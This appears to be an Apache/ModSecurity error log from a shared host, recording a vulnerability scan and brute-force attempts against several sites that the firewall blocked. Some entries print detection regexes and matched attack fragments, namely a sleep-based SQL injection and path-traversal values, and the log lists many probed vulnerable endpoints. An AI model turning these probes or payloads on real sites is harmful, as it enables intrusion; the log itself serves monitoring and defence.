[Tue May 26 12:52:12.066999 2026] [security2:error] [pid 461618:tid 461840] [client 23.94.40.119:60980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/card_scan.php"] [unique_id "ahVKJFyiSlSCHr1fdr2gCQAAAOE"]
[Tue May 26 12:52:12.564651 2026] [security2:error] [pid 461618:tid 461681] [remote 161.97.109.81:45970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVKJFyiSlSCHr1fdr2gFAAAmz4"]
[Tue May 26 12:52:12.639240 2026] [cgid:error] [pid 461618:tid 461867] [client 23.94.40.119:32792] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/supportInstaller: script not found or unable to stat
[Tue May 26 12:52:12.802932 2026] [security2:error] [pid 461618:tid 461853] [client 76.37.131.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKJFyiSlSCHr1fdr2gEgAAAO4"]
[Tue May 26 12:52:13.645509 2026] [security2:error] [pid 461618:tid 461748] [client 23.94.40.119:32838] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/search/"] [unique_id "ahVKJVyiSlSCHr1fdr2gMwAAAIU"]
[Tue May 26 12:52:13.852796 2026] [security2:error] [pid 461618:tid 461772] [client 23.94.40.119:32846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKJVyiSlSCHr1fdr2gOwAAAJ0"]
[Tue May 26 12:52:13.986186 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:32868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/connector.minimal.php"] [unique_id "ahVKJVyiSlSCHr1fdr2gQQAAAMo"]
[Tue May 26 12:52:14.171807 2026] [security2:error] [pid 461618:tid 461763] [client 23.94.40.119:32884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKJlyiSlSCHr1fdr2gRgAAAJQ"]
[Tue May 26 12:52:14.298576 2026] [security2:error] [pid 461618:tid 461804] [client 157.20.138.61:55598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKJlyiSlSCHr1fdr2gUgAAAL0"]
[Tue May 26 12:52:14.298734 2026] [security2:error] [pid 461618:tid 461804] [client 157.20.138.61:55598] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKJlyiSlSCHr1fdr2gUgAAAL0"]
[Tue May 26 12:52:14.627247 2026] [security2:error] [pid 461618:tid 461863] [client 23.94.40.119:32894] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/autodiscover"] [unique_id "ahVKJlyiSlSCHr1fdr2gVwAAAPg"]
[Tue May 26 12:52:14.695789 2026] [security2:error] [pid 461618:tid 461856] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKJlyiSlSCHr1fdr2gUQAAAPE"]
Use of uninitialized value $domain in hash element at /usr/local/cpanel/Cpanel/Email/AutoConfig.pm line 42.
[Tue May 26 12:52:16.043078 2026] [security2:error] [pid 461618:tid 461692] [remote 51.91.98.45:41184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVKJ1yiSlSCHr1fdr2ghgAAyEk"]
[Tue May 26 12:52:17.949325 2026] [security2:error] [pid 461618:tid 461754] [client 23.94.40.119:45252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/include/plugin/payment/alipay/pay.php"] [unique_id "ahVKKVyiSlSCHr1fdr2gwQAAAIs"]
[Tue May 26 12:52:17.979119 2026] [security2:error] [pid 461618:tid 461777] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKKVyiSlSCHr1fdr2guAAAAKI"]
[Tue May 26 12:52:18.635873 2026] [security2:error] [pid 461618:tid 461838] [client 23.94.40.119:45260] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx"] [unique_id "ahVKKlyiSlSCHr1fdr2g4AAAAN8"]
[Tue May 26 12:52:19.228165 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:45288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:udid. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "\\x5c..\\x5c,ARGS:udid"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/mdm/client/v1/mdmLogUploader"] [unique_id "ahVKK1yiSlSCHr1fdr2g8AAAAJI"]
[Tue May 26 12:52:19.471710 2026] [security2:error] [pid 461618:tid 461820] [client 23.94.40.119:45328] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/seo-by-rank-math/readme.txt"] [unique_id "ahVKK1yiSlSCHr1fdr2g-wAAAM0"]
[Tue May 26 12:52:19.675219 2026] [security2:error] [pid 461618:tid 461841] [client 23.94.40.119:45338] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/service/rest/beta/repositories/bower/group"] [unique_id "ahVKK1yiSlSCHr1fdr2g_wAAAOI"]
[Tue May 26 12:52:19.867609 2026] [security2:error] [pid 461618:tid 461845] [client 23.94.40.119:45366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/mailingupgrade.php"] [unique_id "ahVKK1yiSlSCHr1fdr2hAwAAAOY"]
[Tue May 26 12:52:19.929800 2026] [security2:error] [pid 461618:tid 461799] [client 23.94.40.119:45352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ahVKK1yiSlSCHr1fdr2hBwAAALg"]
[Tue May 26 12:52:20.413253 2026] [security2:error] [pid 461618:tid 461757] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKK1yiSlSCHr1fdr2hCgAAAI4"]
[Tue May 26 12:52:20.899863 2026] [security2:error] [pid 461618:tid 461798] [client 23.94.40.119:45426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/installer/index.php"] [unique_id "ahVKLFyiSlSCHr1fdr2hKQAAALc"]
[Tue May 26 12:52:21.568866 2026] [security2:error] [pid 461618:tid 461819] [client 23.94.40.119:45444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKLVyiSlSCHr1fdr2hOgAAAMw"]
[Tue May 26 12:52:21.945276 2026] [cgid:error] [pid 461618:tid 461773] [client 23.94.40.119:45474] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/login.cgi: script not found or unable to stat
[Tue May 26 12:52:22.383391 2026] [security2:error] [pid 461618:tid 461828] [client 23.94.40.119:45504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/roundcube/installer/index.php"] [unique_id "ahVKLlyiSlSCHr1fdr2hXQAAANU"]
[Tue May 26 12:52:22.388384 2026] [security2:error] [pid 461618:tid 461812] [client 23.94.40.119:45496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ahVKLlyiSlSCHr1fdr2hXgAAAMU"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/webadmin/admin/service_manager_data.php
[Tue May 26 12:52:22.443111 2026] [core:crit] [pid 461618:tid 461806] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:52:23.362079 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:45570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/pandora_console/ajax.php"] [unique_id "ahVKL1yiSlSCHr1fdr2hmgAAAJI"]
[Tue May 26 12:52:23.752760 2026] [core:crit] [pid 461618:tid 461806] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:52:23.830685 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:45564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:page. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:page"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ahVKL1yiSlSCHr1fdr2hsgAAAKE"]
[Tue May 26 12:52:23.867227 2026] [security2:error] [pid 461618:tid 461873] [client 23.94.40.119:45596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/crud/userprocess.php"] [unique_id "ahVKL1yiSlSCHr1fdr2htAAAAQI"]
[Tue May 26 12:52:23.876041 2026] [security2:error] [pid 461618:tid 461826] [client 23.94.40.119:45600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "^cmd$" at REQUEST_HEADERS_NAMES:cmd. [file "/opt/mod_security/hg_rules.conf"] [line "901"] [id "900073"] [msg "HTTP_CMD Header attempted"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ahVKL1yiSlSCHr1fdr2htQAAANM"]
[Tue May 26 12:52:23.909790 2026] [security2:error] [pid 461618:tid 461859] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKL1yiSlSCHr1fdr2hoQAAAPQ"]
[Tue May 26 12:52:24.159496 2026] [security2:error] [pid 461618:tid 461839] [client 23.94.40.119:45626] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/mainfunction.cgi/cvmcfgupload"] [unique_id "ahVKMFyiSlSCHr1fdr2hvwAAAOA"]
[Tue May 26 12:52:24.242654 2026] [security2:error] [pid 461618:tid 461813] [client 23.94.40.119:45656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/include/exportUser.php"] [unique_id "ahVKMFyiSlSCHr1fdr2hxgAAAMY"]
[Tue May 26 12:52:24.391133 2026] [security2:error] [pid 461618:tid 461710] [remote 216.73.217.74:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/hni-cash.php"] [unique_id "ahVKMFyiSlSCHr1fdr2hxwAAzVs"]
[Tue May 26 12:52:24.401139 2026] [security2:error] [pid 461618:tid 461854] [client 74.7.228.48:52902] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "worldwidecourier.co.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVKMFyiSlSCHr1fdr2hyAAA72E"]
[Tue May 26 12:52:24.452100 2026] [security2:error] [pid 461618:tid 461842] [client 23.94.40.119:45644] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "x-application/hessian"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/mifs/.;/services/LogService"] [unique_id "ahVKMFyiSlSCHr1fdr2hygAAAOM"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:24.473219 2026] [security2:error] [pid 461618:tid 461774] [client 74.7.228.23:41096] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVKMFyiSlSCHr1fdr2hywAAnxE"]
[Tue May 26 12:52:24.760612 2026] [cgid:error] [pid 461618:tid 461820] [client 23.94.40.119:45658] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/login.cgi: script not found or unable to stat, referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:24.879957 2026] [security2:error] [pid 461618:tid 461800] [client 157.20.138.61:55959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKMFyiSlSCHr1fdr2h2gAAALk"]
[Tue May 26 12:52:24.880055 2026] [security2:error] [pid 461618:tid 461800] [client 157.20.138.61:55959] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKMFyiSlSCHr1fdr2h2gAAALk"]
[Tue May 26 12:52:24.975045 2026] [security2:error] [pid 461618:tid 461819] [client 23.94.40.119:45672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tiki-login_scr.php"] [unique_id "ahVKMFyiSlSCHr1fdr2h2wAAAMw"]
[Tue May 26 12:52:27.051903 2026] [security2:error] [pid 461618:tid 461802] [client 23.94.40.119:45698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/fw.login.php"] [unique_id "ahVKM1yiSlSCHr1fdr2iFQAAALs"]
[Tue May 26 12:52:27.325792 2026] [security2:error] [pid 461618:tid 461825] [client 23.94.40.119:45712] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/fuel/login/"] [unique_id "ahVKM1yiSlSCHr1fdr2iHAAAANI"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:27.362112 2026] [security2:error] [pid 461618:tid 461841] [client 23.94.40.119:45722] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:procedure\\\\s+analyse\\\\s.{0,100}\\\\(|create\\\\s+(procedure|function)\\\\s.{0,100}\\\\w+\\\\s.{0,100}\\\\(\\\\s.{0,200}\\\\)\\\\s.{0,100}declare[^\\\\w]+[@#]\\\\s.{0,100}\\\\w+|exec\\\\s.{0,100}\\\\(\\\\s.{0,200}@|\\\\b(?:sleep|benchmark)\\\\b ?\\\\( ?[0-9])" at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "273"] [id "380122"] [rev "5"] [msg "Atomicorp.com WAF Rules: MySQL and PostgreSQL stored procedure/function injections"] [data "sleep(6"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/fuel/pages/items/"] [unique_id "ahVKM1yiSlSCHr1fdr2iHQAAAOI"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:27.527189 2026] [security2:error] [pid 461618:tid 461811] [client 23.94.40.119:45754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/login.php"] [unique_id "ahVKM1yiSlSCHr1fdr2iIgAAAMQ"]
[Tue May 26 12:52:27.542496 2026] [security2:error] [pid 461618:tid 461835] [client 23.94.40.119:45738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/jars/upload"] [unique_id "ahVKM1yiSlSCHr1fdr2iIwAAANw"]
[Tue May 26 12:52:27.656407 2026] [cgid:error] [pid 461618:tid 461809] [client 23.94.40.119:45770] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/system_log.cgi: script not found or unable to stat
[Tue May 26 12:52:27.748334 2026] [core:crit] [pid 461618:tid 461781] (13)Permission denied: [client 40.77.167.63:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:52:27.767448 2026] [security2:error] [pid 461618:tid 461869] [client 23.94.40.119:45786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php"] [unique_id "ahVKM1yiSlSCHr1fdr2iLAAAAP4"]
[Tue May 26 12:52:28.321162 2026] [security2:error] [pid 461618:tid 461856] [client 178.62.41.40:57518] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahVKNFyiSlSCHr1fdr2iPwAAAPE"], referer: http://moneyapp.com.co/
[Tue May 26 12:52:28.530452 2026] [security2:error] [pid 461618:tid 461860] [client 23.94.40.119:34216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/crud/userprocess.php"] [unique_id "ahVKNFyiSlSCHr1fdr2iRwAAAPU"]
[Tue May 26 12:52:28.550652 2026] [security2:error] [pid 461618:tid 461754] [client 23.94.40.119:34212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cyrus.index.php"] [unique_id "ahVKNFyiSlSCHr1fdr2iSAAAAIs"]
[Tue May 26 12:52:28.667836 2026] [security2:error] [pid 461618:tid 461865] [client 23.94.40.119:34226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tiki-login_scr.php"] [unique_id "ahVKNFyiSlSCHr1fdr2iSQAAAPo"]
[Tue May 26 12:52:28.935576 2026] [security2:error] [pid 461618:tid 461784] [client 23.94.40.119:34230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tiki-index.php"] [unique_id "ahVKNFyiSlSCHr1fdr2iTQAAAKk"]
[Tue May 26 12:52:30.068980 2026] [security2:error] [pid 461618:tid 461753] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKNVyiSlSCHr1fdr2iagAAAIo"]
